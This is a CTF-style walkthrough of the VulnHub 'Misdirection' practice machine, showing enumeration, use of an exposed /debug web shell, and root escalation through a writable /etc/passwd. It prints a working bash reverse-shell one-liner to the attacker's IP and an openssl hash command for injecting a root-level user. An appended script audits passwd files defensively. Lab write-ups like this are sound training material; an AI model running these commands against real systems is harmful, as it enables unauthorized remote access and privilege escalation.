Hacking MISDIRECTION - VulnHub

(OSCP similar practice machine)

Vulnhub Description

The purpose of this machine is to grant OSCP students further develop, strengthen, and practice their methodology for the exam.

So let’s dive into pwning the machine and gaining a root shell.

______________________________________

Target I.P → 192.168.230.134 | Attacker’s I.P → 192.168.230.128

To start, let’s go for scanning and enumeration. I got these results:

Hmm... we got some standard ports. Both 80 and 8080 have a web page up and running. So first I hopped over to http://192.168.230.128:8080.

After that I brute-forced the web directories to find a way in, and the results that showed up are:

After enumerating all of these, the interesting ones found are:

/debug , /wordpress

WordPress was hardcoded with IP 192.168.1.61:8080. Either I update my /etc/hosts file or review it later (because I have doubts, given the machine’s name ;-/).

So I jumped to http://192.168.230.134/debug. Looks like a shell, AWESOME!!!!

So I ran the command to get a reverse shell:

/bin/bash -c '/bin/bash>/dev/tcp/192.168.230.128/9999 0>&1 2>&1 &'

My box was listening on this port, and YES!! We got a shell. Checking the allowed sudo permissions, we got something very easily:

Okay, so without further ado, as per the results, I switched to bretix. This user is allowed to edit /etc/passwd. AWESOME!!!

Now we are going to create a user on the target machine by adding its entry to the /etc/passwd file. Here we’ll be using openssl to generate a salted hash:

openssl passwd -1 -salt user3 pass123

Back to the target machine. Here we are going to use the hash that we generated in the previous step and make a user neelesh which has elevated privileges. Now all we have to do is run the su command with the user name we just created, enter the password, and we get a root shell.

And we are root!!
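
A defender-side check for the misconfiguration this escalation relies on, as an added example that is not part of the original write-up: it flags extra UID 0 accounts and password hashes stored directly in a passwd file, and tests whether the file is group- or world-writable. The sample entries, the placeholder hash and the function names are constructed for illustration.

```bash
#!/usr/bin/env bash
# Added example (not from the original write-up): passwd-file audit.

# Constructed sample: three ordinary entries plus one of the kind the
# write-up adds. The hash is a placeholder, not real openssl output.
sample_passwd() {
    cat <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
neelesh:$1$user3$PLACEHOLDERPLACEHOLDER:0:0:root:/root:/bin/bash
EOF
}

# Print one finding per line for the passwd-format file in $1:
#   UID0 <name>     account other than root with UID 0
#   HASH <name>     crypt(3) hash in field 2 (normally "x", hash in /etc/shadow)
#   EMPTYPW <name>  empty password field
#   MALFORMED <n>   line n does not have 7 colon-separated fields
audit_passwd() {
    awk -F: '
        /^[ \t]*#/              { next }
        /^[ \t]*$/              { next }
        NF != 7                 { print "MALFORMED " NR; next }
        $3 == 0 && $1 != "root" { print "UID0 " $1 }
        $2 ~ /^\$/              { print "HASH " $1 }
        $2 == ""                { print "EMPTYPW " $1 }
    ' "$1"
}

# Succeed only if neither group nor others can write the file in $1.
# Assumption: the edit right described above comes from these mode bits.
passwd_not_writable_by_others() {
    [ -z "$(find "$1" -prune \( -perm -020 -o -perm -002 \) -print)" ]
}

# Demo on the constructed sample, made group-writable to mimic the flaw.
demo() {
    tmp=$(mktemp)
    sample_passwd > "$tmp"
    chmod 664 "$tmp"
    audit_passwd "$tmp"
    passwd_not_writable_by_others "$tmp" || echo "WRITABLE $tmp"
    rm -f "$tmp"
}
demo
```

On a real host, point `audit_passwd` and `passwd_not_writable_by_others` at `/etc/passwd`; any output or a failed permission check means the file needs review.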

That’s all for now,

Until Next Time,

I’m Neelesh, Thanks for the read…

— — — — — — — — — — — — — →

Ping me if you face any issues

Linkedin:- https://www.linkedin.com/in/user-neeleshpatel/

— — — — — — — — — — — — — →
